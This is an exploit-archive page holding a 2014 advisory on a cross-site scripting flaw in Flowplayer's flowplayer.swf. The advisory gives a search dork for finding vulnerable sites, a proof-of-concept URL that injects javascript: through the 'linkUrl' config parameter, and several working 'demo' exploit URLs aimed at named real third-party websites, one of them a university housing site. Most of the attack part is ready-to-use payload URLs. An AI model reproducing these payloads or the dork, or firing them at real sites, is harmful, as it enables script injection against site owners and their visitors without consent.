exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

Flowplayer Cross Site Scripting

Flowplayer Cross Site Scripting
Posted May 16, 2014
Authored by Muhammad Adeel

Flowplayer suffers from a cross site scripting vulnerability.

tags | exploit, xss
SHA-256 | bd7b42db24351194f58b8602dcc1df39d38e8737c82222b996c47480705808f2

Flowplayer Cross Site Scripting

Change Mirror Download
# Flowplayer (js & swf) XSS Vulnerability
# Date: 15/5/14
# Vulnerablity Risk : High
# Vulnerable Sofware: http://flowplayer.org/
# Dork : inurl:flowplayer/flowplayer.swf
# Author: Muhammad Adeel aka Innoxent Stoker
# Founder | Urdusecurity.blogspot.com

# Vulnerability

xss is Cross Site Scripting vuln Which actually interacts With Either
WebServer or The Clients and its Highly Dangrous Vuln Because it May Lead
to Data Stealing and Other Stuff Like That.

# POC & Exploit

xss is in flowplayer.swf Config Command Which is Executing xss while Giving
"linkUrl" ParaMeter


http://Vulnerablesite.com/flowplayer.swf?config={"clip":{"url":"
http://stream.flowplayer.org/bauhaus/624x260.mp4",
"linkUrl":"javascript:confirm(String.fromCharCode(88,83,83));"}}&.swf


# Demo

http://www.advancementprojectca.org/sites/all/modules/flowplayer/flowplayer/flowplayer.swf?config={
"clip":{"url":"http://stream.flowplayer.org/bauhaus/624x260.mp4",
"linkUrl":"javascript:confirm(String.fromCharCode(88, 115, 115, 32, 80,
111, 99, 32, 47, 32, 77, 117, 104, 97, 109, 109, 97, 100, 32, 65, 100, 101,
101, 108, 32, 97, 107, 97, 32, 73, 110, 110, 111, 120, 101, 110, 116, 32,
83, 116, 111, 107, 101, 114, 32, 47, 47, 32, 85, 114, 100, 117, 83, 101,
99));"}}&.swf


http://www.dancelessonsaustin.com/template/fredwoodlands/js/flowplayer/flowplayer.swf?config={%22clip%22:{%22url%22:%22http://stream.flowplayer.org/bauhaus/624x260.mp4%22,%20%22linkUrl%22:%22javascript:confirm%28String.fromCharCode%2888,%20115,%20115,%2032,%2080,%20111,%2099,%2032,%2047,%2032,%2077,%20117,%20104,%2097,%20109,%20109,%2097,%20100,%2032,%2065,%20100,%20101,%20101,%20108,%2032,%2097,%20107,%2097,%2032,%2073,%20110,%20110,%20111,%20120,%20101,%20110,%20116,%2032,%2083,%20116,%20111,%20107,%20101,%20114,%2032,%2047,%2047,%2032,%2085,%20114,%20100,%20117,%2083,%20101,%2099%29%29;%22}}&.swf


http://www.tier1personnel.com/template/default/js/flowplayer/flowplayer.swf?config={%22clip%22:{%22url%22:%22http://stream.flowplayer.org/bauhaus/624x260.mp4%22,%20%22linkUrl%22:%22javascript:confirm%28String.fromCharCode%2888,%20115,%20115,%2032,%2080,%20111,%2099,%2032,%2047,%2032,%2077,%20117,%20104,%2097,%20109,%20109,%2097,%20100,%2032,%2065,%20100,%20101,%20101,%20108,%2032,%2097,%20107,%2097,%2032,%2073,%20110,%20110,%20111,%20120,%20101,%20110,%20116,%2032,%2083,%20116,%20111,%20107,%20101,%20114,%2032,%2047,%2047,%2032,%2085,%20114,%20100,%20117,%2083,%20101,%2099%29%29;%22}}&.swf


https://housing.wwu.edu/include/flowplayer/flowplayer.swf?config={%22clip%22:{%22url%22:%22http://stream.flowplayer.org/bauhaus/624x260.mp4%22,%20%22linkUrl%22:%22javascript:confirm%28String.fromCharCode%2888,%20115,%20115,%2032,%2080,%20111,%2099,%2032,%2047,%2032,%2077,%20117,%20104,%2097,%20109,%20109,%2097,%20100,%2032,%2065,%20100,%20101,%20101,%20108,%2032,%2097,%20107,%2097,%2032,%2073,%20110,%20110,%20111,%20120,%20101,%20110,%20116,%2032,%2083,%20116,%20111,%20107,%20101,%20114,%2032,%2047,%2047,%2032,%2085,%20114,%20100,%20117,%2083,%20101,%2099%29%29;%22}}&.swf
Login or Register to add favorites

File Archive:

May 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    May 1st
    44 Files
  • 2
    May 2nd
    5 Files
  • 3
    May 3rd
    11 Files
  • 4
    May 4th
    0 Files
  • 5
    May 5th
    0 Files
  • 6
    May 6th
    28 Files
  • 7
    May 7th
    3 Files
  • 8
    May 8th
    4 Files
  • 9
    May 9th
    54 Files
  • 10
    May 10th
    12 Files
  • 11
    May 11th
    0 Files
  • 12
    May 12th
    0 Files
  • 13
    May 13th
    18 Files
  • 14
    May 14th
    11 Files
  • 15
    May 15th
    17 Files
  • 16
    May 16th
    13 Files
  • 17
    May 17th
    22 Files
  • 18
    May 18th
    0 Files
  • 19
    May 19th
    0 Files
  • 20
    May 20th
    17 Files
  • 21
    May 21st
    18 Files
  • 22
    May 22nd
    7 Files
  • 23
    May 23rd
    111 Files
  • 24
    May 24th
    27 Files
  • 25
    May 25th
    0 Files
  • 26
    May 26th
    0 Files
  • 27
    May 27th
    6 Files
  • 28
    May 28th
    12 Files
  • 29
    May 29th
    31 Files
  • 30
    May 30th
    0 Files
  • 31
    May 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close